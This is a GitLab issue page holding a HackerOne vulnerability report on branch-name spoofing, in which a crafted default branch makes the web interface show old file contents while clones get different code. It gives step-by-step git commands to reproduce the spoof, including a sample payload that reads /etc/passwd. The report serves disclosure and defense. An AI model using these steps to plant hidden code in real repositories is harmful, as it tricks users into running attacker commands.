The main branch of a repository with a specially designed name allows an attacker to create repositories with malicious code. (#390910) · Issues · GitLab.org / GitLab

The main branch of a repository with a specially designed name allows an attacker to create repositories with malicious code.

**[HackerOne report #1864278](https://hackerone.com/reports/1864278)** by `st4nly0n` on 2023-02-06, assigned to `GitLab Team`: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce) ## Report Description: ================== The main branch of a repository with a specially crafted name allows an attacker to create repositories with malicious code, victims who clone or download these repositories will execute arbitrary code on their systems. When the main branch of a repository has the name `<commit-hash>/<directory>`, for example, `3038cd56e64b952a122215b4bef05814d7a25182/main`, the Gitlab web interface will not display the files belonging to **HEAD**, the Gitlab web interface will display the contents of the files within the main directory that belong to commit `3038cd56e64b952a122215b4bef05814d7a25182`. In this state, the Gitlab web interface is not able to show the actual content of the files, the web interface will always show the content of the files in commit `3038cd56e64b952a122215b4bef0581414d7a25182`, however, when downloading the repository from the web interface or when cloning via **CLI**, the victim gets the content of the files from **HEAD**. Steps To Reproduce: ================== - *The following steps must be performed as the attacker user* **1.** Create a public repository *(Initialize README.md)*. **2.** Unprotect the `main` branch. **3.** Clone and enter the repository: ```bash git clone <repo> cd <repo> ``` **4.** Create a `hello.sh` file, with harmless code: ```bash echo "echo 'hello world'" > hello.sh ``` **5.** Create a directory named `main`: ```bash mkdir main ``` **6.** Copy the `README.md` and `hello.sh` files to the `main` directory: ```bash cp README.md main/ && cp hello.sh main/ ``` **7.** Delete git history: ```bash git update-ref -d HEAD ``` **8.** Confirm changes and push to remote: ```bash git add . git commit -m 'Init' git push origin HEAD -f ``` **9.** Create a **shell variable** with the date of the last commit: ```bash GIT_COMMITTER_DATE=$(git show -s --format=%cd $(git rev-parse HEAD)) ``` **10.** Create a branch with the following format `<last-commit-hash>/<main>`: ```bash git checkout -b "$(git rev-parse HEAD)/main" ``` **11.** Push the branch to the remote: ```bash git push origin HEAD -f ``` **12.** From the web interface, change the default branch to `<last-commit-hash>/<main>` created earlier. **13.** Remove the `main` branch: ```bash git push origin -d main ``` **14.** Remove the `main` directory from the `<last-commit-hash>/<main>` branch: ```bash rm -rf main/ ``` **15.** Change the content of `hello.sh` with the **payload** of your choice: ```bash ### EXAMPLE: echo 'cat /etc/passwd' > hello.sh ``` **16.** Delete git history: ```bash git update-ref -d HEAD ``` **17.** Confirm the changes with the modified date and push to remote: ```bash git add . git commit -m 'Init' --date "$GIT_COMMITTER_DATE" git push origin HEAD -f ``` As a result of this behavior, the proof-of-concept video shows how the victim views a repository through the Gitlab web interface, for the victim the `hello.sh` file does not represent a security risk; however, once it downloads or clones the repository and executes the `hello.sh` file, it executes an unexpected command. **Poc Video** ![poc.mp4](https://h1.sec.gitlab.net/a/cd7f4f19-abd6-439c-9ba9-efc0e80d325e/poc.mp4) What is the current *bug* behavior? =========================== The web interface does not guarantee file integrity when the main branch name has a specially crafted name. This allows an attacker to create repositories with poisoned content. What is the expected *correct* behavior? =========================== The files in the main branch of a repository that are displayed through the Gitlab web interface must be the same as the ones you get when downloading or cloning the repository. Output of checks =========================== This bug happens on GitLab.com #### Impact An attacker can get a victim to execute unexpected arbitrary commands on his system if the victim clones and executes files from a repository that initially do not pose a security risk. For the proof of concept the victim has executed the calculator on his system, however, through what is described in this report, an attacker will want to take control of the victim's system or obtain confidential information, this attack manages to impact the availability, integrity and confidentiality of the affected user. ## Attachments **Warning:** Attachments received through HackerOne, please exercise caution! * [poc.mp4](https://h1.sec.gitlab.net/a/cd7f4f19-abd6-439c-9ba9-efc0e80d325e/poc.mp4) ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues

issue